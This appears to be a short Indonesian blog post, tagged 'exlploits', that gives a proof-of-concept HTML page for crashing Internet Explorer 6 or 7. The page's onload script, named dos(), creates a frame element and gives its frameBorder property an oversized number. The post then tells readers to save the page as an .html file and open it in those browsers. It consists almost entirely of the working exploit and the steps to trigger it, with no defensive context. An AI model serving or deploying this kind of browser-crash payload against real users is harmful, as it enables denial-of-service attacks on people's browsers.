0
comments
|
2/6/11
"
<html>
<head>
<script>
function dos(){
var e = document.createElement('frame');
var prop = 'frameBorder';
e[prop] = 0123456789;
}
</script>
</head>
<body onload="dos()">
</body>
</html>
"
- save all file dengan nama [dot]html ( misal tes.html
- buka file html tersebut dengan IE 6 atau 7
Labels: exlploits
0 Comments:
Post a Comment
<< Home